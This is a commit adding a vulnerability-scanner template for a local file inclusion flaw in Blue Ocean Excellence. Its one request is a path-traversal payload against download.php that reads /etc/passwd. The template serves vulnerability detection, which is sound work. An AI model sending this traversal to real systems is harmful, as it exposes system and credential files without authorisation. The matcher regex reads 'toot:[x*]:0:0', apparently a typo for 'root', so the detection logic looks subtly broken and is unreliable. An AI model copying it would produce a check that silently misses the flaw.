Create blue-ocean-excellence-lfi.yaml

patch-1
PikPikcU 2021-05-31 09:29:51 +00:00 committed by GitHub
parent 1fc0136ba6
commit f944191e7a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 24 additions and 0 deletions

View File

@ -0,0 +1,24 @@
id: blue-ocean-excellence-lfi
info:
name: Blue Ocean Excellence LFI
author: pikpikcu
severity: medium
reference: https://blog.csdn.net/qq_41901122/article/details/116786883
tags: blue-ocean,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/download.php?file=../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "toot:[x*]:0:0"
- type: status
status:
- 200